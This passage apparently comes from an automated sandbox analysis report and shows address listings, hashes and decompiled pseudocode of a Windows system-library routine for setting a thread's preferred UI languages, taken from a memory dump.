                                                                      0x0134267c
                                                                      0x0134267f
                                                                      0x01342681
                                                                      0x01385b49
                                                                      0x01385b4e
                                                                      0x013427cd
                                                                      0x013427d0
                                                                      0x013427d1
                                                                      0x013427d2
                                                                      0x013427d4
                                                                      0x013427dd
                                                                      0x01342687
                                                                      0x01342687
                                                                      0x0134268a
                                                                      0x0134268b
                                                                      0x0134268e
                                                                      0x0134268f
                                                                      0x01342691
                                                                      0x01342696
                                                                      0x01342698
                                                                      0x0134269d
                                                                      0x0134269f
                                                                      0x00000000
                                                                      0x0134269f
                                                                      0x01342681
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342846
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342605
                                                                      0x0134260a
                                                                      0x0134260c
                                                                      0x01342611
                                                                      0x01342616
                                                                      0x01342619
                                                                      0x01342619
                                                                      0x0134261e
                                                                      0x00000000
                                                                      0x01342624
                                                                      0x01342627
                                                                      0x01342627
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01385b1f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342894
                                                                      0x0134289b
                                                                      0x0134289d
                                                                      0x013428a1
                                                                      0x01385b2b
                                                                      0x01385b2e
                                                                      0x01385b2e
                                                                      0x013428a7
                                                                      0x013428a9
                                                                      0x01385b04
                                                                      0x01385b09
                                                                      0x01385b09
                                                                      0x01385b09
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01385b35
                                                                      0x01385b3c
                                                                      0x013428fb
                                                                      0x013428fb
                                                                      0x013426cc
                                                                      0x013426cc
                                                                      0x013426d0
                                                                      0x00000000
                                                                      0x013426d2
                                                                      0x013426d2
                                                                      0x00000000
                                                                      0x013426d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013425fe
                                                                      0x0134292d
                                                                      0x0134292f
                                                                      0x01342930
                                                                      0x01342935
                                                                      0x01342939
                                                                      0x0134293d
                                                                      0x01342941
                                                                      0x01342945
                                                                      0x01342946
                                                                      0x01342949
                                                                      0x0134294e
                                                                      0x0134294f
                                                                      0x01342951
                                                                      0x01342951
                                                                      0x01342952
                                                                      0x01342955
                                                                      0x0134295a
                                                                      0x0134295d
                                                                      0x01342962
                                                                      0x01342963
                                                                      0x01342965
                                                                      0x01342966
                                                                      0x01342969
                                                                      0x0134296a
                                                                      0x0134296e
                                                                      0x0134296f
                                                                      0x01342971
                                                                      0x01342974
                                                                      0x0134297b
                                                                      0x0134297d
                                                                      0x0134297e
                                                                      0x0134297f
                                                                      0x01342980
                                                                      0x01342981
                                                                      0x01342982
                                                                      0x01342983
                                                                      0x01342984
                                                                      0x01342985
                                                                      0x01342986
                                                                      0x01342987
                                                                      0x01342988
                                                                      0x01342989
                                                                      0x0134298a
                                                                      0x0134298b
                                                                      0x0134298c
                                                                      0x0134298d
                                                                      0x0134298e
                                                                      0x0134298f
                                                                      0x01342990
                                                                      0x01342992
                                                                      0x01342997
                                                                      0x013429a3
                                                                      0x013429a6
                                                                      0x013429ab
                                                                      0x013429ad
                                                                      0x013429b0
                                                                      0x013429b2
                                                                      0x01385c80
                                                                      0x013429b8
                                                                      0x013429b8
                                                                      0x013429bb
                                                                      0x013429c0
                                                                      0x013429c5
                                                                      0x013429c6
                                                                      0x013429c6
                                                                      0x013429c9
                                                                      0x013429cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013429cd
                                                                      0x013429d0
                                                                      0x013429d9
                                                                      0x013429db
                                                                      0x013429dd
                                                                      0x01342a7f
                                                                      0x01342a84
                                                                      0x01342a87
                                                                      0x01342a89
                                                                      0x01385ca1
                                                                      0x01385ca3
                                                                      0x00000000
                                                                      0x01342a8f
                                                                      0x01342a8f
                                                                      0x00000000
                                                                      0x01342a8f
                                                                      0x00000000
                                                                      0x013429e3
                                                                      0x013429e3
                                                                      0x013429e3
                                                                      0x00000000
                                                                      0x013429e3
                                                                      0x013429dd
                                                                      0x00000000
                                                                      0x013429db
                                                                      0x013429e6
                                                                      0x013429e9
                                                                      0x013429eb
                                                                      0x013429ed
                                                                      0x013429f3
                                                                      0x013429f5
                                                                      0x013429f8
                                                                      0x013429fa
                                                                      0x01342a97
                                                                      0x01342a9a
                                                                      0x01342a9d
                                                                      0x01342add
                                                                      0x00000000
                                                                      0x01342a9f
                                                                      0x01342aa2
                                                                      0x01342aa5
                                                                      0x01342aa8
                                                                      0x01342aab
                                                                      0x01385cab
                                                                      0x01385caf
                                                                      0x01385cc5
                                                                      0x01385cda
                                                                      0x01385cdc
                                                                      0x01385cdf
                                                                      0x01385ce5
                                                                      0x00000000
                                                                      0x01385ceb
                                                                      0x01385ced
                                                                      0x01385cee
                                                                      0x00000000
                                                                      0x01385cee
                                                                      0x01385cb1
                                                                      0x01385cb4
                                                                      0x01385cb9
                                                                      0x01385cbb
                                                                      0x00000000
                                                                      0x01385cbd
                                                                      0x01385cbd
                                                                      0x00000000
                                                                      0x01385cbd
                                                                      0x01385cbb
                                                                      0x01342ab1
                                                                      0x01342ab1
                                                                      0x01342ac4
                                                                      0x01342ac6
                                                                      0x01342ac6
                                                                      0x00000000
                                                                      0x01342ac6
                                                                      0x01342aab
                                                                      0x00000000
                                                                      0x01342a00
                                                                      0x01342a09
                                                                      0x01342a0e
                                                                      0x01342a21
                                                                      0x01342a24
                                                                      0x01342a35
                                                                      0x01342a3a
                                                                      0x01342a3d
                                                                      0x01342a42
                                                                      0x01342a59
                                                                      0x01342a59
                                                                      0x01342a5c
                                                                      0x01342a5f
                                                                      0x01342a5f
                                                                      0x013429fa
                                                                      0x013429f3
                                                                      0x01342a64
                                                                      0x01342a64
                                                                      0x01342a6b
                                                                      0x01342a6b
                                                                      0x01342a6d
                                                                      0x01342a72
                                                                      0x01342a72
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 5de2f69ce3870974f7b8abd0e6be91116651b8d4c88b5fa9c51c3dbf6e5753c7
                                                                      • Instruction ID: c23f08ed19a74aec4bf1a5ebf24148357f34b38cbb73c597265622943bb181a1
                                                                      • Opcode Fuzzy Hash: 5de2f69ce3870974f7b8abd0e6be91116651b8d4c88b5fa9c51c3dbf6e5753c7
                                                                      • Instruction Fuzzy Hash: E4C1AF75D00219DBDB25DF99E980AAEBBF5FF48758F044029F901BB250E774A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E0134FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                      				char _v5;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				char _v17;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				signed int _v40;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t73;
                                                                      				intOrPtr* _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t79;
                                                                      				signed int _t81;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t85;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t91;
                                                                      				signed int _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t106;
                                                                      				signed int _t108;
                                                                      				signed int _t114;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				signed int _t122;
                                                                      				signed int _t123;
                                                                      				void* _t129;
                                                                      				signed int _t130;
                                                                      				void* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t170;
                                                                      				void* _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      
                                                                      				_t129 = __ebx;
                                                                      				_push(_t132);
                                                                      				_push(__esi);
                                                                      				_t174 = _t132;
                                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                                      				if(_t73 >= 0) {
                                                                      					L5:
                                                                      					return _t73;
                                                                      				} else {
                                                                      					E0132EEF0(0x1407b60);
                                                                      					_t134 =  *0x1407b84; // 0x771c7b80
                                                                      					_t2 = _t174 + 0x24; // 0x24
                                                                      					_t75 = _t2;
                                                                      					if( *_t134 != 0x1407b80) {
                                                                      						_push(3);
                                                                      						asm("int 0x29");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						_push(0x1407b60);
                                                                      						_t170 = _v8;
                                                                      						_v28 = 0;
                                                                      						_v40 = 0;
                                                                      						_v24 = 0;
                                                                      						_v17 = 0;
                                                                      						_v32 = 0;
                                                                      						__eflags = _t170 & 0xffff7cf2;
                                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                                      							L43:
                                                                      							_t77 = 0xc000000d;
                                                                      						} else {
                                                                      							_t79 = _t170 & 0x0000000c;
                                                                      							__eflags = _t79;
                                                                      							if(_t79 != 0) {
                                                                      								__eflags = _t79 - 0xc;
                                                                      								if(_t79 == 0xc) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							} else {
                                                                      								_t170 = _t170 | 0x00000008;
                                                                      								__eflags = _t170;
                                                                      								L9:
                                                                      								_t81 = _t170 & 0x00000300;
                                                                      								__eflags = _t81 - 0x300;
                                                                      								if(_t81 == 0x300) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									_t138 = _t170 & 0x00000001;
                                                                      									__eflags = _t138;
                                                                      									_v24 = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										__eflags = _t81;
                                                                      										if(_t81 != 0) {
                                                                      											goto L43;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										L11:
                                                                      										_push(_t129);
                                                                      										_t77 = E01326D90( &_v20);
                                                                      										_t130 = _t77;
                                                                      										__eflags = _t130;
                                                                      										if(_t130 >= 0) {
                                                                      											_push(_t174);
                                                                      											__eflags = _t170 & 0x00000301;
                                                                      											if((_t170 & 0x00000301) == 0) {
                                                                      												_t176 = _a8;
                                                                      												__eflags = _t176;
                                                                      												if(__eflags == 0) {
                                                                      													L64:
                                                                      													_t83 =  *[fs:0x18];
                                                                      													_t177 = 0;
                                                                      													__eflags =  *(_t83 + 0xfb8);
                                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                                      														E013276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                      													}
                                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													asm("sbb edx, edx");
                                                                      													_t114 = E013B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                      													__eflags = _t114;
                                                                      													if(_t114 < 0) {
                                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                      														E0131B150();
                                                                      													}
                                                                      													_t116 = E013B6D81(_t176,  &_v16);
                                                                      													__eflags = _t116;
                                                                      													if(_t116 >= 0) {
                                                                      														__eflags = _v16 - 2;
                                                                      														if(_v16 < 2) {
                                                                      															L56:
                                                                      															_t118 = E013275CE(_v20, 5, 0);
                                                                      															__eflags = _t118;
                                                                      															if(_t118 < 0) {
                                                                      																L67:
                                                                      																_t130 = 0xc0000017;
                                                                      																goto L32;
                                                                      															} else {
                                                                      																__eflags = _v12;
                                                                      																if(_v12 == 0) {
                                                                      																	goto L67;
                                                                      																} else {
                                                                      																	_t153 =  *0x1408638; // 0x0
                                                                      																	_t122 = L013238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                      																	_t154 = _v12;
                                                                      																	_t130 = _t122;
                                                                      																	__eflags = _t130;
                                                                      																	if(_t130 >= 0) {
                                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                      																		__eflags = _t123;
                                                                      																		if(_t123 != 0) {
                                                                      																			_t155 = _a12;
                                                                      																			__eflags = _t155;
                                                                      																			if(_t155 != 0) {
                                                                      																				 *_t155 = _t123;
                                                                      																			}
                                                                      																			goto L64;
                                                                      																		} else {
                                                                      																			E013276E2(_t154);
                                                                      																			goto L41;
                                                                      																		}
                                                                      																	} else {
                                                                      																		E013276E2(_t154);
                                                                      																		_t177 = 0;
                                                                      																		goto L18;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags =  *_t176;
                                                                      															if( *_t176 != 0) {
                                                                      																goto L56;
                                                                      															} else {
                                                                      																__eflags =  *(_t176 + 2);
                                                                      																if( *(_t176 + 2) == 0) {
                                                                      																	goto L64;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t130 = 0xc000000d;
                                                                      														goto L32;
                                                                      													}
                                                                      												}
                                                                      												goto L35;
                                                                      											} else {
                                                                      												__eflags = _a8;
                                                                      												if(_a8 != 0) {
                                                                      													_t77 = 0xc000000d;
                                                                      												} else {
                                                                      													_v5 = 1;
                                                                      													L0134FCE3(_v20, _t170);
                                                                      													_t177 = 0;
                                                                      													__eflags = 0;
                                                                      													L15:
                                                                      													_t85 =  *[fs:0x18];
                                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                      														L18:
                                                                      														__eflags = _t130;
                                                                      														if(_t130 != 0) {
                                                                      															goto L32;
                                                                      														} else {
                                                                      															__eflags = _v5 - _t130;
                                                                      															if(_v5 == _t130) {
                                                                      																goto L32;
                                                                      															} else {
                                                                      																_t86 =  *[fs:0x18];
                                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                      																}
                                                                      																__eflags = _t177;
                                                                      																if(_t177 == 0) {
                                                                      																	L31:
                                                                      																	__eflags = 0;
                                                                      																	L013270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	__eflags = _v24;
                                                                      																	_t91 =  *(_t177 + 0x20);
                                                                      																	if(_v24 != 0) {
                                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                      																		goto L31;
                                                                      																	} else {
                                                                      																		_t141 = _t91 & 0x00000040;
                                                                      																		__eflags = _t170 & 0x00000100;
                                                                      																		if((_t170 & 0x00000100) == 0) {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 == 0) {
                                                                      																				L74:
                                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                      																				goto L27;
                                                                      																			} else {
                                                                      																				_t177 = E0134FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					goto L42;
                                                                      																				} else {
                                                                      																					_t130 = E0134FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						_t68 = _t177 + 0x20;
                                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						__eflags =  *_t68;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L74;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			goto L35;
                                                                      																		} else {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 != 0) {
                                                                      																				_t177 = E0134FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					L42:
                                                                      																					_t77 = 0xc0000001;
                                                                      																					goto L33;
                                                                      																				} else {
                                                                      																					_t130 = E0134FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L26;
                                                                      																					}
                                                                      																				}
                                                                      																				goto L35;
                                                                      																			} else {
                                                                      																				L26:
                                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                      																				__eflags = _t94;
                                                                      																				L27:
                                                                      																				 *(_t177 + 0x20) = _t94;
                                                                      																				__eflags = _t170 & 0x00008000;
                                                                      																				if((_t170 & 0x00008000) != 0) {
                                                                      																					_t95 = _a12;
                                                                      																					__eflags = _t95;
                                                                      																					if(_t95 != 0) {
                                                                      																						_t96 =  *_t95;
                                                                      																						__eflags = _t96;
                                                                      																						if(_t96 != 0) {
                                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                                      																							_t40 = _t177 + 0x20;
                                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                      																							__eflags =  *_t40;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				goto L31;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                      														_t106 =  *(_t147 + 0x20);
                                                                      														__eflags = _t106 & 0x00000040;
                                                                      														if((_t106 & 0x00000040) != 0) {
                                                                      															_t147 = E0134FD22(_t147);
                                                                      															__eflags = _t147;
                                                                      															if(_t147 == 0) {
                                                                      																L41:
                                                                      																_t130 = 0xc0000001;
                                                                      																L32:
                                                                      																_t77 = _t130;
                                                                      																goto L33;
                                                                      															} else {
                                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                      																_t106 =  *(_t147 + 0x20);
                                                                      																goto L17;
                                                                      															}
                                                                      															goto L35;
                                                                      														} else {
                                                                      															L17:
                                                                      															_t108 = _t106 | 0x00000080;
                                                                      															__eflags = _t108;
                                                                      															 *(_t147 + 0x20) = _t108;
                                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                      															goto L18;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											L33:
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L35:
                                                                      						return _t77;
                                                                      					} else {
                                                                      						 *_t75 = 0x1407b80;
                                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                      						 *_t134 = _t75;
                                                                      						 *0x1407b84 = _t75;
                                                                      						_t73 = E0132EB70(_t134, 0x1407b60);
                                                                      						if( *0x1407b20 != 0) {
                                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                      								_t73 = E0132FF60( *0x1407b20);
                                                                      							}
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

















































                                                                      0x0134fab0
                                                                      0x0134fab2
                                                                      0x0134fab3
                                                                      0x0134fab4
                                                                      0x0134fabc
                                                                      0x0134fac0
                                                                      0x0134fb14
                                                                      0x0134fb17
                                                                      0x0134fac2
                                                                      0x0134fac8
                                                                      0x0134facd
                                                                      0x0134fad3
                                                                      0x0134fad3
                                                                      0x0134fadd
                                                                      0x0134fb18
                                                                      0x0134fb1b
                                                                      0x0134fb1d
                                                                      0x0134fb1e
                                                                      0x0134fb1f
                                                                      0x0134fb20
                                                                      0x0134fb21
                                                                      0x0134fb22
                                                                      0x0134fb23
                                                                      0x0134fb24
                                                                      0x0134fb25
                                                                      0x0134fb26
                                                                      0x0134fb27
                                                                      0x0134fb28
                                                                      0x0134fb29
                                                                      0x0134fb2a
                                                                      0x0134fb2b
                                                                      0x0134fb2c
                                                                      0x0134fb2d
                                                                      0x0134fb2e
                                                                      0x0134fb2f
                                                                      0x0134fb3a
                                                                      0x0134fb3b
                                                                      0x0134fb3e
                                                                      0x0134fb41
                                                                      0x0134fb44
                                                                      0x0134fb47
                                                                      0x0134fb4a
                                                                      0x0134fb4d
                                                                      0x0134fb53
                                                                      0x0138bdcb
                                                                      0x0138bdcb
                                                                      0x0134fb59
                                                                      0x0134fb5b
                                                                      0x0134fb5b
                                                                      0x0134fb5e
                                                                      0x0138bdd5
                                                                      0x0138bdd8
                                                                      0x00000000
                                                                      0x0138bdda
                                                                      0x00000000
                                                                      0x0138bdda
                                                                      0x0134fb64
                                                                      0x0134fb64
                                                                      0x0134fb64
                                                                      0x0134fb67
                                                                      0x0134fb6e
                                                                      0x0134fb70
                                                                      0x0134fb72
                                                                      0x00000000
                                                                      0x0134fb78
                                                                      0x0134fb7a
                                                                      0x0134fb7a
                                                                      0x0134fb7d
                                                                      0x0134fb80
                                                                      0x0138bddf
                                                                      0x0138bde1
                                                                      0x00000000
                                                                      0x0138bde3
                                                                      0x00000000
                                                                      0x0138bde3
                                                                      0x0134fb86
                                                                      0x0134fb86
                                                                      0x0134fb86
                                                                      0x0134fb8b
                                                                      0x0134fb90
                                                                      0x0134fb92
                                                                      0x0134fb94
                                                                      0x0134fb9a
                                                                      0x0134fb9b
                                                                      0x0134fba1
                                                                      0x0138bde8
                                                                      0x0138bdeb
                                                                      0x0138bded
                                                                      0x0138beb5
                                                                      0x0138beb5
                                                                      0x0138bebb
                                                                      0x0138bebd
                                                                      0x0138bec3
                                                                      0x0138bed2
                                                                      0x0138bedd
                                                                      0x0138bedd
                                                                      0x0138beed
                                                                      0x00000000
                                                                      0x0138bdf3
                                                                      0x0138bdfe
                                                                      0x0138be06
                                                                      0x0138be0b
                                                                      0x0138be0d
                                                                      0x0138be0f
                                                                      0x0138be14
                                                                      0x0138be19
                                                                      0x0138be20
                                                                      0x0138be25
                                                                      0x0138be27
                                                                      0x0138be35
                                                                      0x0138be39
                                                                      0x0138be46
                                                                      0x0138be4f
                                                                      0x0138be54
                                                                      0x0138be56
                                                                      0x0138bef8
                                                                      0x0138bef8
                                                                      0x00000000
                                                                      0x0138be5c
                                                                      0x0138be5c
                                                                      0x0138be60
                                                                      0x00000000
                                                                      0x0138be66
                                                                      0x0138be66
                                                                      0x0138be7f
                                                                      0x0138be84
                                                                      0x0138be87
                                                                      0x0138be89
                                                                      0x0138be8b
                                                                      0x0138be99
                                                                      0x0138be9d
                                                                      0x0138bea0
                                                                      0x0138beac
                                                                      0x0138beaf
                                                                      0x0138beb1
                                                                      0x0138beb3
                                                                      0x0138beb3
                                                                      0x00000000
                                                                      0x0138bea2
                                                                      0x0138bea2
                                                                      0x00000000
                                                                      0x0138bea2
                                                                      0x0138be8d
                                                                      0x0138be8d
                                                                      0x0138be92
                                                                      0x00000000
                                                                      0x0138be92
                                                                      0x0138be8b
                                                                      0x0138be60
                                                                      0x0138be3b
                                                                      0x0138be3b
                                                                      0x0138be3e
                                                                      0x00000000
                                                                      0x0138be40
                                                                      0x0138be40
                                                                      0x0138be44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0138be44
                                                                      0x0138be3e
                                                                      0x0138be29
                                                                      0x0138be29
                                                                      0x00000000
                                                                      0x0138be29
                                                                      0x0138be27
                                                                      0x00000000
                                                                      0x0134fba7
                                                                      0x0134fba7
                                                                      0x0134fbab
                                                                      0x0138bf02
                                                                      0x0134fbb1
                                                                      0x0134fbb1
                                                                      0x0134fbb8
                                                                      0x0134fbbd
                                                                      0x0134fbbd
                                                                      0x0134fbbf
                                                                      0x0134fbbf
                                                                      0x0134fbc5
                                                                      0x0134fbcb
                                                                      0x0134fbf8
                                                                      0x0134fbf8
                                                                      0x0134fbfa
                                                                      0x00000000
                                                                      0x0134fc00
                                                                      0x0134fc00
                                                                      0x0134fc03
                                                                      0x00000000
                                                                      0x0134fc09
                                                                      0x0134fc09
                                                                      0x0134fc0f
                                                                      0x0134fc15
                                                                      0x0134fc23
                                                                      0x0134fc23
                                                                      0x0134fc25
                                                                      0x0134fc27
                                                                      0x0134fc75
                                                                      0x0134fc7c
                                                                      0x0134fc84
                                                                      0x00000000
                                                                      0x0134fc29
                                                                      0x0134fc29
                                                                      0x0134fc2d
                                                                      0x0134fc30
                                                                      0x0138bf0f
                                                                      0x00000000
                                                                      0x0134fc36
                                                                      0x0134fc38
                                                                      0x0134fc3b
                                                                      0x0134fc41
                                                                      0x0138bf17
                                                                      0x0138bf19
                                                                      0x0138bf48
                                                                      0x0138bf4b
                                                                      0x00000000
                                                                      0x0138bf1b
                                                                      0x0138bf22
                                                                      0x0138bf24
                                                                      0x0138bf26
                                                                      0x00000000
                                                                      0x0138bf2c
                                                                      0x0138bf37
                                                                      0x0138bf39
                                                                      0x0138bf3b
                                                                      0x00000000
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf45
                                                                      0x00000000
                                                                      0x0138bf45
                                                                      0x0138bf3b
                                                                      0x0138bf26
                                                                      0x00000000
                                                                      0x0134fc47
                                                                      0x0134fc47
                                                                      0x0134fc49
                                                                      0x0134fcb2
                                                                      0x0134fcb4
                                                                      0x0134fcb6
                                                                      0x0134fcdc
                                                                      0x0134fcdc
                                                                      0x00000000
                                                                      0x0134fcb8
                                                                      0x0134fcc3
                                                                      0x0134fcc5
                                                                      0x0134fcc7
                                                                      0x00000000
                                                                      0x0134fcc9
                                                                      0x0134fcc9
                                                                      0x0134fccd
                                                                      0x00000000
                                                                      0x0134fccd
                                                                      0x0134fcc7
                                                                      0x00000000
                                                                      0x0134fc4b
                                                                      0x0134fc4b
                                                                      0x0134fc4e
                                                                      0x0134fc4e
                                                                      0x0134fc51
                                                                      0x0134fc51
                                                                      0x0134fc54
                                                                      0x0134fc5a
                                                                      0x0134fc5c
                                                                      0x0134fc5f
                                                                      0x0134fc61
                                                                      0x0134fc63
                                                                      0x0134fc65
                                                                      0x0134fc67
                                                                      0x0134fc6e
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc67
                                                                      0x0134fc61
                                                                      0x00000000
                                                                      0x0134fc5a
                                                                      0x0134fc49
                                                                      0x0134fc41
                                                                      0x0134fc30
                                                                      0x0134fc27
                                                                      0x0134fc03
                                                                      0x0134fbcd
                                                                      0x0134fbd3
                                                                      0x0134fbd9
                                                                      0x0134fbdc
                                                                      0x0134fbde
                                                                      0x0134fc99
                                                                      0x0134fc9b
                                                                      0x0134fc9d
                                                                      0x0134fcd5
                                                                      0x0134fcd5
                                                                      0x0134fc89
                                                                      0x0134fc89
                                                                      0x00000000
                                                                      0x0134fc9f
                                                                      0x0134fc9f
                                                                      0x0134fca3
                                                                      0x00000000
                                                                      0x0134fca3
                                                                      0x00000000
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe9
                                                                      0x0134fbf2
                                                                      0x00000000
                                                                      0x0134fbf2
                                                                      0x0134fbde
                                                                      0x0134fbcb
                                                                      0x0134fbab
                                                                      0x0134fc8b
                                                                      0x0134fc8b
                                                                      0x0134fc8c
                                                                      0x0134fb80
                                                                      0x0134fb72
                                                                      0x0134fb5e
                                                                      0x0134fc8d
                                                                      0x0134fc91
                                                                      0x0134fadf
                                                                      0x0134fadf
                                                                      0x0134fae1
                                                                      0x0134fae4
                                                                      0x0134fae7
                                                                      0x0134faec
                                                                      0x0134faf8
                                                                      0x0134fb00
                                                                      0x0134fb07
                                                                      0x0134fb0f
                                                                      0x0134fb0f
                                                                      0x0134fb07
                                                                      0x00000000
                                                                      0x0134faf8
                                                                      0x0134fadd

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0138BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 7f27e10c795344339a89714f61d9b67324b83eb177374e8c5b24f9accfb6bde8
                                                                      • Instruction ID: c5e712b352a54b77683feb7f6f1921946507b84827cd48f347e92e0349b10cfd
                                                                      • Opcode Fuzzy Hash: 7f27e10c795344339a89714f61d9b67324b83eb177374e8c5b24f9accfb6bde8
                                                                      • Instruction Fuzzy Hash: 15A10371B007068FEB26EF6CC450B6AB7E8AF44718F084569D946CB695DB30EC05CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
